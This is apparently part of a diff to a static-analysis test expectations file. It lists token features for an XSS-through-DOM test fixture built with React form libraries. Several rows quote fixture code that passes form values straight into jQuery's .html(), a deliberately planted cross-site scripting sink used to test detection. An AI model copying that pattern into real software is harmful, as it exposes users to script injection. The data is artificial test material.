App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:30:23:41 | { name: '' } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:23:30:23:41 | { name: '' } | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:30:23:41 | { name: '' } | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:30:23:41 | { name: '' } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:35 | name | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:35 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:35 | name | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:35 | name | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:35 | name | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:32:23:39 | name: '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:23:38:23:39 | '' | assignedToPropName | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:38:23:39 | '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:23:38:23:39 | '' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:23:38:23:39 | '' | enclosingFunctionBody | name | +| autogenerated/Xss/XssThroughDom/forms.js:23:38:23:39 | '' | enclosingFunctionName | mapPropsToValues | +| autogenerated/Xss/XssThroughDom/forms.js:23:38:23:39 | '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:24:12 | validate | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:24:12 | validate | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:24:12 | validate | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:26:5 | validat ... K\\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:26:5 | validat ... K\\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:26:5 | validat ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:26:5 | validat ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:26:5 | validat ... K\\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:5:26:5 | validat ... K\\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:24:20 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | 'arguments' object of method validate | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | 'arguments' object of method validate | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | 'arguments' object of method validate | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | 'arguments' object of method validate | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | 'arguments' object of method validate | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | exceptional return of method validate | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | exceptional return of method validate | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | exceptional return of method validate | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | exceptional return of method validate | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | exceptional return of method validate | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | return of method validate | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | return of method validate | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | return of method validate | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | return of method validate | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | return of method validate | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | values ... K\\n } | CalleeFlexibleAccessPath | withFormik | | autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | values ... K\\n } | InputAccessPathFromCallee | 0.validate | | autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | values ... K\\n } | InputArgumentIndex | 0 | @@ -24292,6 +159211,36 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | values ... K\\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | | autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | values ... K\\n } | contextSurroundingFunctionParameters | (values) | | autogenerated/Xss/XssThroughDom/forms.js:24:15:26:5 | values ... K\\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:9 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:9 | $ | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:9 | $ | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:9 | $ | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:9 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | $("#id") | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | $("#id") | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | $("#id") | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | exceptional return of $("#id") | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | exceptional return of $("#id") | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:16 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:21 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:21 | $("#id").html | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:21 | $("#id").html | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:21 | $("#id").html | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:21 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | $("#id" ... .email) | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | $("#id" ... .email) | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | $("#id" ... .email) | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | exceptional return of $("#id" ... .email) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | exceptional return of $("#id" ... .email) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | exceptional return of $("#id" ... .email) | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | exceptional return of $("#id" ... .email) | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:9:25:35 | exceptional return of $("#id" ... .email) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:25:11:25:15 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:25:11:25:15 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:25:11:25:15 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24299,6 +159248,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:25:11:25:15 | "#id" | enclosingFunctionBody | values $ #id html values email | | autogenerated/Xss/XssThroughDom/forms.js:25:11:25:15 | "#id" | enclosingFunctionName | validate | | autogenerated/Xss/XssThroughDom/forms.js:25:11:25:15 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:18:25:21 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:18:25:21 | html | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:25:18:25:21 | html | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:18:25:21 | html | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:18:25:21 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:23:25:28 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:23:25:28 | values | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:25:23:25:28 | values | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:23:25:28 | values | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:23:25:28 | values | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:25:23:25:34 | values.email | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:25:23:25:34 | values.email | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:25:23:25:34 | values.email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24306,6 +159265,25 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:25:23:25:34 | values.email | enclosingFunctionBody | values $ #id html values email | | autogenerated/Xss/XssThroughDom/forms.js:25:23:25:34 | values.email | enclosingFunctionName | validate | | autogenerated/Xss/XssThroughDom/forms.js:25:23:25:34 | values.email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:25:30:25:34 | email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:25:30:25:34 | email | contextSurroundingFunctionParameters | (values) | +| autogenerated/Xss/XssThroughDom/forms.js:25:30:25:34 | email | enclosingFunctionBody | values $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:25:30:25:34 | email | enclosingFunctionName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:25:30:25:34 | email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:28:16 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:28:16 | handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:28:16 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:30:5 | handleS ... K\\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:30:5 | handleS ... K\\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:30:5 | handleS ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:30:5 | handleS ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:30:5 | handleS ... K\\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:5:30:5 | handleS ... K\\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | 'arguments' object of method handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | 'arguments' object of method handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | 'arguments' object of method handleSubmit | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | 'arguments' object of method handleSubmit | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | 'arguments' object of method handleSubmit | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | (values ... K\\n } | CalleeFlexibleAccessPath | withFormik | | autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | (values ... K\\n } | InputAccessPathFromCallee | 0.handleSubmit | | autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | (values ... K\\n } | InputArgumentIndex | 0 | @@ -24314,6 +159292,81 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | (values ... K\\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | | autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | (values ... K\\n } | contextSurroundingFunctionParameters | (values, ?) | | autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | (values ... K\\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | exceptional return of method handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | exceptional return of method handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | exceptional return of method handleSubmit | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | exceptional return of method handleSubmit | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | exceptional return of method handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | return of method handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | return of method handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | return of method handleSubmit | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | return of method handleSubmit | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:19:30:5 | return of method handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:20:28:25 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:28:28:44 | { setSubmitting } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:28:28:44 | { setSubmitting } | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:28:28:28:44 | { setSubmitting } | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:28:28:44 | { setSubmitting } | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:28:28:44 | { setSubmitting } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | contextSurroundingFunctionParameters | (values, ?) | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionBody | values setSubmitting $ #id html values email | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | enclosingFunctionName | handleSubmit | +| autogenerated/Xss/XssThroughDom/forms.js:28:30:28:42 | setSubmitting | fileImports | formik react react-final-form react-hook-form | 